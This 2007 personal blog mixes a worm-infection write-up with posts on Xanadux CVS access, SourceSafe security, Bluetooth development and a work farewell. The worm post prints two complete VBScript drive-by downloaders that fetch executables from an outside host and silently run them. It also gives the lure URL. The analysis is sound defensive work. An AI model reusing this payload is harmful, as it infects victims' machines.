Search This Blog

Sunday, April 29, 2007

Catching a worm

Peace be upon you

it was a tough day to me, :D I was installing windows and other things that I used to use on my machin, anyways the first thing I do after installing windows is to install MSN, I got Message from someone very imortant to me, he/she sends me a link

http://th ecool pics.net/don tclick.jpg

DOn't OPEN THIS LINK IT HAS THE WORM


I opened the link, and I noticed it cause a very dilay on my machin, I said to my self wait for a second to see what is coming, nothing the page was so normal, after while I tried to open "RUN" and I found that it is "Restricted", also the Task Manager,
I used "Process Explorer" and I found that there is a very strange processes, I got MAD, WORM ON MY MACHIN, of course I tried all the old tricks, Safe mode and try to restore and workin restore point, but NOWAY, they guy who made it is very clever, he expected what I am going to do and he / she deleted my restore application :D, for his/her bad luck that I always have a running copy of windows that I don't touch, I use it only for emargance, :D I got a copy of the system restore applicaiton and I get back to clean working point :D, and I decide to know what is the hell is going on :D
I got the like that I mentioned before, I downloaded the image and I found that it is redirect to some other place that redirect ot ver far place :D , at last I got this code



of course anyone know Javascript will know esacp and unescap functions, I did a very simple page that unescae this content and put it in TextArea, and I found a very nice simple code for encrypting the content "dF(s)" this was the function name, I did anther Textarea to put the output of the Textarea , and what I saw make me get shocked :D, simply I don't update my internet explorer for this stupid exploit

I got the code that copies the worm to my machin

and here it is





< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/YMworm.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="IEXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t>

< language="VBS_C_R_I_P_T">
on error resume next
dl = "http://ns1.hosting101.biz/~metalurg/images/template/worm2007.E_x_E"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&amp;a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="EXPLORE.E_x_E"
set F = df.createobject("S_C_R_I_P_Ting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
< / s_c_r_i_p_t >

now after I got this simple javascript code that copies a stupid executable and run it on my machin, I have downloaded this file and I open it with Notepad :D don't laugh I don't have anything now on my HD, I found that it is encrypted , I searched for the file name with the beloved google and I foun this link that tells a lot about the virus
http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM_SOHANAD.AL&VSect=T

I wish this topic useful to you, and I want to say something at last "DO N'T TRUST SOMETHING U DON'T SEE, remember there is opictal illusion :D so Don't trust anything :D"

Thursday, April 26, 2007

Messing up with Xanadux code

Peace be upon you

First of all What is Xanadux? Xanadux is a linux porting for pocket pc u can find its project at Sourceforge, I will tell u exactly what I face until I got copy of the code, first of all I tried to check out the code on the web viewer, it was nice but not enough,after while I read that I can download the code if I am useing some source control application "CVS Client", I know CVS long time ago, but I never though that it may be useful for windows users, anyways I downloaded something called "TortoiseCVS", This applicatoin is amazing, it's integarte with windows explorer, after that I created a new folder then right click on the new folder and "CVS Checkout", after that I entered the path of the CVS in the CVSRoot field then I clicked on "Fetch list", then I picked the Module that I want Xanadux it was about 13 modules, I downloaded them in about 6 hours, I had a quick view over the code, I can say it awesomem there is tans of documets, also I tried the "cyace-arm" on EVC4 and it was amazing "it compiles" with 0 errors and 0 warnings, I dind't try any other module, ALLAH willing I will continue after I get some free time and for sure I will write all I got, please give me some feed back.

P.S: Link to Xanadux on source
http://sourceforge.net/projects/xanadux
P.S: CVS Root for Xanadux
:pserver:anonymous@xanadux.cvs.sourceforge.net:/cvsroot/xanadux

Saturday, April 21, 2007

Hacking source-safe

Peace be upon you

hi people this topic will be very short, it is just a little note for Source-safe administrator,
your safe can be cracked , which means that the source code is not secured anymore, simply it can be hacked because of some human faults, people always do some brute force attack, all I can say for you that password hashing in source-safe isn't good, but you have to make some policies for protecting your code this is by making a good users hierarchy, don't give Administration permission for anyone who deal with code, use misleading names for administration permission, DO NOT EVER USE THE ACCOUNT ADMIN, there is tools that crack source-safe passwords, I think you have to make a lot of fake users, try to find any plug in for source safe that do tracking for the whole event happening on the code, that's all I can say for now, I will try to get some cases that has more help , right now I can't talk a lot about it, because if said more it will be like "how to hack source safe", for now it's ok, I will try to provide some live samples, thanks for time

Bluetooth development with Desktop

Peace be upon you

how are you guys? I miss you so much, it has been long time for the my last post, now lets begin,
I will talk today about Bluetooth (the beloved cheap communiction method), this thing is brilliant, we didn't utilize at as it must be done, anyways, I will start after my friend Mohamed Allam stop, he wrote amazing introduction about the bluetooth , I will put this document after taking his permission, anyways, lets talk about how to start developing software for bluetooth under windows, when I started this thing I was little lost, but I found that the AMAZING microsoft is always ready for any question, they did amazing work in the Windows platform SDK, I found that there is sample for bluetooth and it is so easy to reach to what they have done for us, after installing Microsoft Windows Platform SDK, you will find the sample on this path

%Program Files Folder%\Microsoft Platform SDK\Samples\NetDS\Bluetooth

now I think you should read this sample and run it then continue this topic :D I will continue if there is someone interseted on this issue, I am waiting for your feed back ;)

bye

The best farewell happen in history was mine

Peace be upon you

I have just left Imaginet, I will say it trully, Imaginet is part of my heart I don't know why I like this place but it seems that I like places that make technology, it was so hard to leave there but it is ok, the best part of it was my farewell party, it was amazing , no it was more than amazing, all people was there for me, some people don't share such parties was there, even business team was there, I was so happy, everyone of them ask me a question, I was so happy for that I was answering without any probelm, I like this people so much, I have history with them, I wanted to cry but I felt it is not suitable, people was so nice to me there

KOKO,S7syko , Maha, Zizo, Malek, Kandel, Hamed, MOHSEEEEEEEEEN :D,Ihab, Rofa, Mr.Bahaa ( The Magician ), Mostafa (IceManZ), Rasha , Hagar

this guys are amazing I can't forget them, they did a very amazing party for me,

I LOVE YOU ALL SO MUCH, I WILL MISS YOU SO MUCH

I wish you always remember me with good :) and forget about my heavy killing jokes :D, I promise that I will stop it :D

please always remember me , and I promise that I will never forget all of you,